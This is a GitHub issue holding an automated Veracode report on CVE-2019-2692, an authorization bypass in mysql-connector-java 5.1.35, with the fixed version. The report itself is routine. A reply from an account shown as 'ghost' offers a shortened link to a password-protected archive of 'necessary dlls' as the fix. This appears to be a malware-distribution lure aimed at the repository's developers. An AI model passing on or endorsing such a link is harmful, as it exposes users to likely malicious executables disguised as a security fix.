julz0815 / test-action

0 stars 1 forks source link

CVE: 2019-2692 found in mysql-connector-java - Version: 5.1.35 [JAVA] #1180

Open github-actions[bot] opened 1 month ago

github-actions[bot] commented 1 month ago

Veracode Software Composition Analysis

Attribute Details
Library mysql-connector-java
Description MySQL java connector
Language JAVA
Vulnerability Authorization Bypass
Vulnerability description mysql-connector-java is vulnerable to authorization bypass. A difficult-to-exploit vulnerability allows a high-privileged attacker to bypass authorization, compromise the MySQL connectors and obtain full control over the connectors.
CVE 2019-2692
CVSS score 3.5
Vulnerability present in version/s 2.0.14-8.0.15
Found library version/s 5.1.35
Vulnerability fixed in version 8.0.16
Library latest version 8.0.33
Fix

Links:

ghost commented 1 month ago

I think this will help you. https://bit.ly/4gABgKn Archive codepass: changeme I put the necessary dlls in the archive